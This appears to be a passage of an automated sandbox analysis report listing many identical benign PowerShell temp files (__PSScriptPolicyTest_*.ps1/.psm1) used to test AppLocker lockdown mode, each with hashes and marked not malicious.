                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fjarckhs.xpf.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fl4qp1pf.11w.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqcv4wqx.jkr.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fyx5txao.kq1.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g015jd4i.1j5.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0lly2kc.5br.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gm4wfbvd.3cn.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gsfnmtno.gqd.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmccz3dr.04n.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnnxs4pl.oap.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hu01ixfk.fem.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hu4e0uq4.li1.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iec44eut.a3t.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iy5zjt4r.fe3.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmgtgech.dhh.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jq23i445.hjm.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvhahkgl.s5s.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kj4qbsw1.odh.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvk1wn1d.f0q.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l5hjfshq.cu4.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbtjuf5k.ir0.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lkilbgfx.0k2.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lorwyoge.4pa.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lwuc53f0.ksx.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3vwa43l.22q.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mc0izjsn.4y1.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mu5rcmlk.xqz.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5zhfgjo.oy5.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nhqghpg5.qv3.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
